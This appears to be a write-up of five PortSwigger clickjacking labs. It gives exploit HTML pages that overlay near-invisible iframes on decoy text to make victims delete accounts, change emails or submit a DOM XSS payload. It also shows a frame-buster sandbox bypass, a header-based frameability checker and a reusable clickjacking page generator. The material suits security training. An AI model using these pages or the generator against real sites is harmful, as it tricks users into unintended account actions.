PortSwigger Web Security Academy: Clickjacking (UI redressing)
1 - Basic clickjacking with CSRF token protection
-
Lab description
- After logging in, a user can delete their own account, but this function is protected by a CSRF token
-
Goal
- Make the victim delete their own account
-
Solution
-
Since the CSS needs tuning, I started from the code given in the lab material. The specific values were off and had to be adjusted; on screen the overlay did not line up, but while I was still adjusting it the lab reported solved. I did not note down the original values.

```html
<head>
  <style>
    /* The real page: laid over the decoy, almost fully transparent, on top (z-index 2) */
    #target_website {
      position: relative;
      width: 1280px;
      height: 400px;
      opacity: 0.0000000000001;
      z-index: 2;
    }
    /* The decoy text, positioned so it sits right under the "Delete account" button */
    #decoy_website {
      position: absolute;
      top: 575px;
      left: 100px;
      z-index: 1;
    }
  </style>
</head>
...
<body>
  <div id="decoy_website">click</div>
  <iframe id="target_website" src="https://ac411f1c1e3720d880aa0ddc00c8008d.web-security-academy.net/my-account"></iframe>
</body>
```
-
2 - Clickjacking with form input data prefilled from a URL parameter
-
Lab description
- Nothing worth describing
-
Goal
- Use the prefilled form field to change the user's email address
-
Solution
-
Visit `/my-account?email=asd@asd.asd` and observe that the email address is prefilled into the form on the page.
-
Build the malicious page for the phish (reusing the code from the previous lab)

```html
<head>
  <style>
    /* The real page on top, nearly invisible; the src prefills the email field */
    #target_website {
      position: relative;
      width: 400px;
      height: 600px;
      opacity: 0.0000001;
      z-index: 2;
    }
    /* The decoy text, positioned under the "Update email" button */
    #decoy_website {
      position: absolute;
      top: 525px;
      left: 100px;
      z-index: 1;
    }
  </style>
</head>
<body>
  <div id="decoy_website">Click me</div>
  <iframe id="target_website" src="https://ac131f121fdf9d78802b4cc1006300fb.web-security-academy.net/my-account?email=asd@asd.asd"></iframe>
</body>
```
-
3 - Clickjacking with a frame buster script
-
Lab description
- This lab is protected by a frame buster
-
Goal
- Change the victim's email address
-
Solution
-
The lab material covers the frame buster: roughly, the page only accepts running as the top-level window (the root of the frame tree) and otherwise tries to break out of the frame. There is plenty about it online; [here is one write-up](https://zhuanlan.zhihu.com/p/27310909).
-
But if the iframe sets the `sandbox` attribute to `allow-forms` or `allow-scripts` and omits `allow-top-navigation`, the frame buster is neutralised: the framed page is not permitted to navigate the top-level window, so the usual `top.location = self.location` escape silently fails. With `allow-forms` alone the framed page's scripts do not run at all, so the buster never executes, while the form still submits. Note that this only defeats a JavaScript frame buster; an `X-Frame-Options` header or a CSP `frame-ancestors` directive is enforced by the browser, and the sandbox attribute does nothing against those.
-
Build the exploit

```html
<head>
  <style>
    #target_website {
      position: relative;
      width: 400px;
      height: 600px;
      opacity: 0.0000001;
      z-index: 2;
    }
    #decoy_website {
      position: absolute;
      top: 505px;
      left: 100px;
      z-index: 1;
    }
  </style>
</head>
<body>
  <div id="decoy_website">Click me</div>
  <!-- sandbox="allow-forms": the form can still be submitted, but the framed page's
       frame-busting script cannot run or navigate the top-level window -->
  <iframe id="target_website" sandbox="allow-forms" src="https://ac741fe61e32394280fe03af00970035.web-security-academy.net/my-account?email=asd@asd.asd"></iframe>
</body>
```
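The sandbox trick above only works because the lab page ships no anti-framing headers. Before spending time aligning a decoy, a practitioner checks whether the target can be framed at all. The following is an added example, not code from this write-up or from PortSwigger: a small Node.js check that applies the browser's rules to a response's headers, with a CSP `frame-ancestors` directive taking precedence over `X-Frame-Options`, and with any unrecognised `X-Frame-Options` value (including the obsolete `ALLOW-FROM`) ignored as current browsers do. The hostnames `exploit.example` and `lab.example` and the sample header sets are constructed for the demonstration; source matching is simplified (explicit ports only, paths ignored, conflicting duplicate `X-Frame-Options` values not modelled).

```javascript
// Added example (not from the lab write-up). Decides whether framerOrigin may
// embed a page served with the given response headers.
//   1. CSP with a frame-ancestors directive decides; X-Frame-Options is then ignored.
//   2. Otherwise X-Frame-Options DENY / SAMEORIGIN decide; other values are ignored.
//   3. With neither header the page is frameable; only a JS frame buster remains,
//      and lab 3 shows that the iframe sandbox attribute defeats that.

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Case-insensitive lookup in a plain { name: value } header object.
function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? null : String(headers[key]);
}

// Source list of the frame-ancestors directive, or null when the policy has none.
function frameAncestorsSources(cspValue) {
  for (const directive of cspValue.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0 && tokens[0].toLowerCase() === "frame-ancestors") {
      return tokens.slice(1);
    }
  }
  return null;
}

// Does one CSP source expression allow framerOrigin to embed pageOrigin?
function sourceMatches(source, framerOrigin, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return framerOrigin === pageOrigin;
  if (s === "*") return true;
  const framer = new URL(framerOrigin);
  // scheme-source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.protocol === s;
  // host-source: [scheme://][*.]host[:port|:*]  (path part ignored here)
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && framer.protocol !== scheme + ":") return false;
  const hostOk = wildcard ? framer.hostname.endsWith("." + host) : framer.hostname === host;
  if (!hostOk) return false;
  if (port && port !== "*") {
    const framerPort = framer.port || DEFAULT_PORTS[framer.protocol] || "";
    if (framerPort !== port) return false;
  }
  return true;
}

function isFrameable(headers, framerOrigin, pageOrigin) {
  const csp = getHeader(headers, "content-security-policy");
  if (csp !== null) {
    const sources = frameAncestorsSources(csp);
    if (sources !== null) {
      return sources.some((src) => sourceMatches(src, framerOrigin, pageOrigin));
    }
  }
  const xfo = getHeader(headers, "x-frame-options");
  if (xfo !== null) {
    const value = xfo.trim().toUpperCase();
    if (value === "DENY") return false;
    if (value === "SAMEORIGIN") return framerOrigin === pageOrigin;
    // ALLOW-FROM and other unknown values are ignored by current browsers.
  }
  return true;
}

// Constructed sample header sets (hypothetical hostnames). The lab's /my-account
// page corresponds to the first entry: no header at all, so the iframe loads.
const ATTACKER = "https://exploit.example";
const LAB = "https://lab.example";
const SAMPLES = {
  "no anti-framing header (the lab pages)": {},
  "X-Frame-Options: DENY": { "X-Frame-Options": "DENY" },
  "CSP frame-ancestors 'none'": { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" },
  "CSP allows a partner, XFO ignored": {
    "Content-Security-Policy": "frame-ancestors 'self' https://*.trusted.example",
    "X-Frame-Options": "DENY",
  },
};

for (const [label, headers] of Object.entries(SAMPLES)) {
  console.log(`${label}: frameable from ${ATTACKER}? ${isFrameable(headers, ATTACKER, LAB)}`);
}
```

Feed it the headers from a real response (for example the object returned by `fetch` or the ones captured in Burp) together with the origin the exploit server will be hosted on; a `false` means no amount of CSS or sandbox tuning will get the frame to render.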
-
4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS
-
Lab description
- Combine DOM-based XSS with clickjacking
-
Goal
- Call alert(document.cookie)
-
Solution
-
First find the XSS: the fields on the feedback page can be prefilled through GET parameters, and after the form is submitted the name is echoed straight back into the page, so a payload placed in name executes.
-
Build the exploit

```html
<head>
  <style>
    /* The framed feedback page, with the XSS payload prefilled into the name field
       via the query string; the victim's click submits it */
    #target_website {
      position: relative;
      width: 1000px;
      height: 1000px;
      opacity: 0.00000001;
      z-index: 2;
    }
    /* The decoy text, positioned under the "Submit feedback" button */
    #decoy_website {
      position: absolute;
      top: 805px;
      left: 100px;
      z-index: 1;
    }
  </style>
</head>
<body>
  <div id="decoy_website">Click me</div>
  <iframe id="target_website" src="https://ac2c1f701efa1dee807e67af00d40001.web-security-academy.net/feedback?name=%3Cimg/src=x%20onerror=alert(document.cookie)%3E&email=asd@asd.com&subject=asd&message=asd"></iframe>
</body>
```
-
5 - Multistep clickjacking
-
Lab description
- The account functions in this lab are protected by a CSRF token, and a confirmation dialog is used to defend against clickjacking
-
Goal
- Make the victim delete their own account
-
Solution
-
Just one extra dialog. Compared with a real-world target, where the decoy would have to change dynamically after the first click, this is easy: both decoys can be placed on the page at once.
-
The exploit

```html
<head>
  <style>
    #target_website {
      position: relative;
      width: 1000px;
      height: 1000px;
      opacity: 0.0000001;
      z-index: 2;
    }
    /* First decoy: under the "Delete account" button */
    #decoy_website_1 {
      position: absolute;
      top: 495px;
      left: 60px;
      z-index: 1;
    }
    /* Second decoy: under the "Yes" button of the confirmation dialog that appears after the first click */
    #decoy_website_2 {
      position: absolute;
      top: 285px;
      left: 190px;
      z-index: 1;
    }
  </style>
</head>
<body>
  <div id="decoy_website_1">Click me first</div>
  <div id="decoy_website_2">Click me next</div>
  <iframe id="target_website" src="https://ac871f9f1e4e40b7801a875000290076.web-security-academy.net/my-account"></iframe>
</body>
```
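The five exploit pages above are one template with different numbers plugged in, and the hand-edited query strings (labs 2 and 4) are easy to get wrong. As an added example, not code from this write-up or from PortSwigger, here is a Node.js generator that takes the target URL, the prefill parameters, the decoy positions, the opacity and the sandbox value as inputs, so the lab-2 prefill, the lab-3 sandbox bypass, the lab-4 XSS payload and the lab-5 two-step decoys are all just different calls. The hostname `lab.example`, the function names and the coordinates are hypothetical; real coordinates still come from lining the frame up by eye first.

```javascript
// Added example (not from the lab write-up): generator for clickjacking pages
// of the shape used in the labs above. Hostnames and coordinates are hypothetical.

// Build the framed URL with the prefill parameters percent-encoded, so that a
// payload such as <img src=x onerror=...> survives the query string intact.
function buildTargetUrl(base, params = {}) {
  const url = new URL(base);
  for (const [key, value] of Object.entries(params)) url.searchParams.set(key, value);
  return url.toString();
}

// Minimal HTML escaping for text and attribute values written into the page.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// decoys: one { text, top, left } per click the victim must make (lab 5 needs two).
// opacity is a string so that values like "0.0000001" are not rendered as "1e-7";
// use "0.5" while aligning the overlay, then drop to a near-zero value.
// sandbox: e.g. "allow-forms" to defeat a JavaScript frame buster (lab 3);
// null leaves the iframe unsandboxed, which is needed when the framed page's
// own scripts must run, as for the DOM XSS in lab 4.
function makeClickjackPage({ target, params = {}, width, height, opacity = "0.0000001", decoys, sandbox = null }) {
  const decoyCss = decoys
    .map((d, i) => `#decoy_${i + 1} { position: absolute; top: ${d.top}px; left: ${d.left}px; z-index: 1; }`)
    .join("\n    ");
  const decoyHtml = decoys
    .map((d, i) => `<div id="decoy_${i + 1}">${escapeHtml(d.text)}</div>`)
    .join("\n  ");
  const sandboxAttr = sandbox === null ? "" : ` sandbox="${escapeHtml(sandbox)}"`;
  const src = escapeHtml(buildTargetUrl(target, params));
  return `<!DOCTYPE html>
<html>
<head>
  <style>
    #target_website { position: relative; width: ${width}px; height: ${height}px; opacity: ${opacity}; z-index: 2; }
    ${decoyCss}
  </style>
</head>
<body>
  ${decoyHtml}
  <iframe id="target_website"${sandboxAttr} src="${src}"></iframe>
</body>
</html>`;
}

// Lab-3 style: prefilled email plus sandbox to neutralise the frame buster.
const LAB = "https://lab.example"; // hypothetical lab origin
const emailPage = makeClickjackPage({
  target: `${LAB}/my-account`,
  params: { email: "asd@asd.asd" },
  width: 400,
  height: 600,
  decoys: [{ text: "Click me", top: 505, left: 100 }],
  sandbox: "allow-forms",
});

// Lab-4 style: XSS payload prefilled into the feedback form, no sandbox.
const xssPage = makeClickjackPage({
  target: `${LAB}/feedback`,
  params: { name: "<img/src=x onerror=alert(document.cookie)>", email: "asd@asd.com", subject: "asd", message: "asd" },
  width: 1000,
  height: 1000,
  opacity: "0.00000001",
  decoys: [{ text: "Click me", top: 805, left: 100 }],
});

// Lab-5 style: two decoys, one for "Delete account" and one for the "Yes" confirmation.
const multiStepPage = makeClickjackPage({
  target: `${LAB}/my-account`,
  width: 1000,
  height: 1000,
  decoys: [
    { text: "Click me first", top: 495, left: 60 },
    { text: "Click me next", top: 285, left: 190 },
  ],
});

console.log(emailPage);
```

Host the returned string on the exploit server as-is. For a new target, start with `opacity: "0.5"`, adjust `top`/`left` until each decoy sits under its button, then regenerate with the near-zero opacity.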
-